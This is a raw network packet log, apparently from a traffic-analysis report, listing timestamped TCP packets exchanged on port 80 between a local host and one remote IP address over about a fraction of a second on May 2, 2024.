                                                                              May 2, 2024 17:21:55.885766983 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.885771036 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.885801077 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.885808945 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.885837078 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.885891914 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.885921001 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.885932922 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.885936022 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.885955095 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.885965109 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.885970116 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886002064 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886079073 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886122942 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886131048 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886145115 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886174917 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886182070 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886184931 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886214972 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886223078 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886248112 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886250973 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886270046 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886286020 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886307955 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886315107 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886349916 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886384964 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886423111 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886424065 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886460066 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886482000 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886523962 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886535883 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886548042 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886578083 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886642933 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886677027 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886683941 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886718035 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886739016 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886785984 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886795044 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886833906 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886840105 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886851072 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886893988 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886908054 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886949062 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.886953115 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886992931 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.886993885 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887018919 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887037992 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887048006 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887115002 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887159109 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887211084 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887228012 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887240887 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887252092 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887254953 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887280941 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887281895 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887286901 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887295008 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887316942 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887316942 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887330055 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887351990 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887356043 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887392044 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887470961 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887522936 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887537003 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887551069 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887583017 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887628078 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887669086 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887692928 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887741089 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887751102 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887790918 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887814045 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887825966 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887861013 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887883902 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887926102 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.887926102 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887976885 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.887984991 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888029099 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888040066 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888047934 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888058901 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888103008 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888190031 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888237000 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888272047 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888309956 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888377905 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888422012 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888473988 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888513088 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888552904 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888605118 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888636112 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888680935 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888686895 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888726950 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888746023 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888757944 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888792992 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888804913 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888828039 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888839960 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888869047 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888870001 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888885975 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888911009 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.888937950 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.888978004 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889077902 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889090061 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889101982 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889127970 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889141083 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889187098 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889219999 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889229059 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889262915 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889281034 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889291048 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889308929 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889327049 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889374971 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889400005 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889434099 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889486074 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889516115 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889524937 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889544010 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889590025 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889595985 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889626980 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889628887 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889676094 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889684916 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889697075 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889724970 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889733076 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889735937 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889772892 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889810085 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889828920 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889853954 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889866114 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889878035 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.889913082 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.889978886 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.890019894 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.890028954 CEST804974987.121.105.163192.168.2.4
                                                                              May 2, 2024 17:21:55.890069008 CEST4974980192.168.2.487.121.105.163
                                                                              May 2, 2024 17:21:55.890093088 CEST804974987.121.105.163192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:21:55.890116930 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890136003 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890147924 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890158892 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890194893 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890208006 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890219927 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890248060 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890261889 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890311003 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890322924 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890355110 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890364885 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890398979 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890420914 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890434980 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890470982 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890522957 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890564919 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890603065 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890642881 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890646935 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890687943 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890738964 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890765905 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890778065 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890779972 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890796900 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890809059 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890809059 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890809059 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890824080 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890832901 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890845060 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890866995 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890871048 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890882015 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890898943 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890908957 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890913010 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890922070 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890940905 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890954018 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.890963078 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890974998 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890985966 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.890999079 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891010046 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891019106 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891040087 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891067028 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891069889 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891083002 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891096115 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891107082 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891110897 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891119003 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891141891 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891175032 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891176939 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891181946 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891189098 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891196012 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891206980 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891221046 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891232967 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891244888 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891268015 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891275883 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891304970 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891323090 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891335011 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891355991 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891364098 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891387939 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891448975 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891462088 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891475916 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:55.891486883 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891499043 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:55.891518116 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.051440001 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.051512003 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.051529884 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.051570892 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.051639080 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.051686049 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.051717043 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.051762104 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.051795959 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.051839113 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052041054 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052090883 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052145958 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052191973 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052206993 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052301884 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052318096 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052366018 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052479982 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052526951 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052740097 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052791119 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052798986 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052844048 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052900076 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.052947998 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.052973032 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.053019047 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.053100109 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.053148031 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.053271055 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.053318977 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.053374052 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.053421021 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.053607941 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.053657055 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.054393053 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.054439068 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.054522038 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.054562092 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.054776907 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.054819107 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.054822922 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.054856062 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.054896116 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.054951906 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.054986954 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055011034 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055027962 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055037975 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055103064 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055160999 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055211067 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055238962 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055278063 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055299044 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055299044 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055339098 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055351019 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055394888 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055461884 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055515051 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055530071 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055573940 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055574894 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055615902 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055655003 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055694103 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055777073 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055815935 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055851936 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.055902958 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.055979013 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
May 2, 2024 17:21:56.056025028 CEST | 49749 | 80 | 192.168.2.4 | 87.121.105.163
May 2, 2024 17:21:56.056201935 CEST | 80 | 49749 | 87.121.105.163 | 192.168.2.4
